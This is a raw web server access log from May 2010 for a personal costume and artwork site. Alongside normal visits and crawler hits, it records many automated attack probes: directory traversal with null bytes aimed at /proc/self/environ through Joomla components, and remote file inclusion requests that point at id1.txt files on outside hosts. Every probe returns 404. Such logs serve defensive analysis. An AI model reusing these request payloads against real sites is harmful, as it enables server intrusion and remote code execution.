121.88.4.141 - - [24/May/2010:19:52:53 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.249.85.67 - - [24/May/2010:19:53:25 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17,gzip(gfe) (via translate.google.com)"
189.70.205.48 - - [24/May/2010:19:53:28 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.com.br&usg=ALkJrhhZOWZCJ8NV2M_oM8FY0E4dbpemxg""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17"
189.70.205.48 - - [24/May/2010:19:53:28 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.com.br&usg=ALkJrhhZOWZCJ8NV2M_oM8FY0E4dbpemxg""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17"
189.70.205.48 - - [24/May/2010:19:53:30 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.com.br&usg=ALkJrhhZOWZCJ8NV2M_oM8FY0E4dbpemxg""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17"
207.46.204.185 - - [24/May/2010:19:55:02 -0500] "GET /logs/access_log.1250899200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.79.246.241 - - [24/May/2010:19:55:09 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
77.79.246.241 - - [24/May/2010:19:55:10 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
77.79.246.241 - - [24/May/2010:19:55:10 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
66.230.221.15 - - [24/May/2010:19:55:21 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.230.221.15 - - [24/May/2010:19:55:21 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-""libwww-perl/5.834"
66.230.221.15 - - [24/May/2010:19:55:22 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 294 "-"""
66.230.221.15 - - [24/May/2010:19:55:22 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-"""
66.230.221.15 - - [24/May/2010:19:55:24 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.230.221.15 - - [24/May/2010:19:55:24 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-""libwww-perl/5.834"
66.230.221.15 - - [24/May/2010:19:55:24 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 299 "-"""
66.230.221.15 - - [24/May/2010:19:55:24 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-"""
66.230.221.15 - - [24/May/2010:19:55:26 -0500] "GET /logs/access_log.1271548800//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.230.221.15 - - [24/May/2010:19:55:27 -0500] "GET /logs/access_log.1271548800//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-""libwww-perl/5.834"
66.230.221.15 - - [24/May/2010:19:55:27 -0500] "GET /logs/access_log.1271548800//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 321 "-"""
66.230.221.15 - - [24/May/2010:19:55:27 -0500] "GET /logs/access_log.1271548800//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-"""
62.44.82.61 - - [24/May/2010:19:55:43 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.44.82.61 - - [24/May/2010:19:55:43 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
62.44.82.61 - - [24/May/2010:19:55:43 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
77.79.246.241 - - [24/May/2010:19:56:51 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
198.161.91.4 - - [24/May/2010:19:58:55 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:19:58:55 -0500] "GET /e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:19:58:55 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:19:58:58 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:19:58:58 -0500] "GET /e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:19:58:58 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.204.241 - - [24/May/2010:19:59:31 -0500] "GET /logs/access_log.1212883200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.192.168.241 - - [24/May/2010:20:00:04 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:00:04 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:00:04 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:00:07 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:00:07 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:00:07 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:00:13 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:00:13 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:00:13 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:20:01:06 -0500] "GET / HTTP/1.1" 200 1003 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.248.150.84 - - [24/May/2010:20:01:22 -0500] "GET /e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
125.248.150.84 - - [24/May/2010:20:01:22 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
125.248.150.84 - - [24/May/2010:20:01:22 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.248.150.84 - - [24/May/2010:20:02:09 -0500] "GET /e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 292 "-""Mozilla/5.0"
125.248.150.84 - - [24/May/2010:20:02:09 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 297 "-""Mozilla/5.0"
125.248.150.84 - - [24/May/2010:20:02:10 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head????? HTTP/1.1" 404 319 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:25 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:25 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:25 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:26 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:26 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:26 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:27 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:27 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:27 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:29 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:29 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:02:29 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:18 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:18 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:18 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:19 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:19 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:19 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:23 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:23 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:28 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:30 -0500] "GET //index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:30 -0500] "GET /logs//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
91.192.168.241 - - [24/May/2010:20:03:30 -0500] "GET /logs/access_log.1271635200//index2.php?option=com_webeecomment&controller=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.88.4.141 - - [24/May/2010:20:03:54 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
121.88.4.141 - - [24/May/2010:20:03:55 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
121.88.4.141 - - [24/May/2010:20:03:55 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [24/May/2010:20:06:07 -0500] "GET /artwork/index.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [24/May/2010:20:12:55 -0500] "GET /logs/access_log.1274140800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
64.131.245.98 - - [24/May/2010:20:13:53 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.google.com/search?hl=en&rlz=1T4ADBR_enUS308US309&q=costumes+all+nations&revid=814584468&ei=iCD7S-KAKYL58AbCwpjkCg&sa=X&oi=revisions_inline&resnum=0&ct=broad-revision&cd=3&ved=0CE8Q1QIoAg""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.131.245.98 - - [24/May/2010:20:13:54 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.131.245.98 - - [24/May/2010:20:13:54 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.131.245.98 - - [24/May/2010:20:13:54 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
64.131.245.98 - - [24/May/2010:20:13:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
87.250.255.243 - - [24/May/2010:20:20:15 -0500] "GET /logs/access_log.1272412800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
89.146.194.66 - - [24/May/2010:20:20:42 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:20:42 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.37.197 - - [24/May/2010:20:20:58 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.806"
87.106.37.197 - - [24/May/2010:20:20:59 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
89.146.194.66 - - [24/May/2010:20:21:08 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:21:09 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.118.82.120 - - [24/May/2010:20:21:57 -0500] "GET /logs/access_log.1272412800/index2.php?pagina=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.118.82.120 - - [24/May/2010:20:21:57 -0500] "GET /logs/index2.php?pagina=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
87.118.82.120 - - [24/May/2010:20:21:57 -0500] "GET /index2.php?pagina=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.146.194.66 - - [24/May/2010:20:22:01 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:22:53 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.37.197 - - [24/May/2010:20:22:58 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
207.46.13.46 - - [24/May/2010:20:23:01 -0500] "GET /logs/access_log.1255564800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.88.4.141 - - [24/May/2010:20:23:24 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
77.79.246.241 - - [24/May/2010:20:23:38 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
89.146.194.66 - - [24/May/2010:20:25:30 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.37.197 - - [24/May/2010:20:25:48 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
89.146.194.66 - - [24/May/2010:20:27:21 -0500] "GET /logs/access_log.1274313600//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:27:22 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:27:22 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:27:48 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:27:49 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:27:49 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.79.246.241 - - [24/May/2010:20:28:22 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
77.79.246.241 - - [24/May/2010:20:28:22 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
77.79.246.241 - - [24/May/2010:20:28:22 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
77.79.246.241 - - [24/May/2010:20:28:23 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
87.106.37.197 - - [24/May/2010:20:29:14 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.806"
87.106.37.197 - - [24/May/2010:20:29:14 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
87.106.37.197 - - [24/May/2010:20:29:15 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.806"
87.250.255.243 - - [24/May/2010:20:30:40 -0500] "GET /artwork/coffins.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
89.146.194.66 - - [24/May/2010:20:30:51 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:30:51 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.106.37.197 - - [24/May/2010:20:30:54 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.806"
87.106.37.197 - - [24/May/2010:20:30:55 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
174.133.204.130 - - [24/May/2010:20:31:56 -0500] "GET /logs/index2.php?pg=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.204.130 - - [24/May/2010:20:31:56 -0500] "GET /index2.php?pg=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.204.130 - - [24/May/2010:20:31:56 -0500] "GET /logs/access_log.1271376000/index2.php?pg=http://www.fwinc.jp/daria/research/fx29id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:20:36:07 -0500] "GET /logs//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:20:36:07 -0500] "GET //Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:20:36:07 -0500] "GET /logs/access_log.1272240000//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:20:36:07 -0500] "GET //Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:20:36:07 -0500] "GET /logs//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
198.161.91.4 - - [24/May/2010:20:36:07 -0500] "GET /logs/access_log.1272240000//Madirish_Webmail/index.php?basedir=http://moveonfoundation.com/cache/mod_fpss/zfxid1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
89.146.194.66 - - [24/May/2010:20:37:29 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:37:29 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.146.194.66 - - [24/May/2010:20:37:29 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.106.37.197 - - [24/May/2010:20:37:45 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.806"
87.106.37.197 - - [24/May/2010:20:37:46 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.806"
87.106.37.197 - - [24/May/2010:20:37:46 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.806"
87.250.255.243 - - [24/May/2010:20:38:10 -0500] "GET /artwork/mobiles.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [24/May/2010:20:41:32 -0500] "GET /logs/access_log.1175731200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
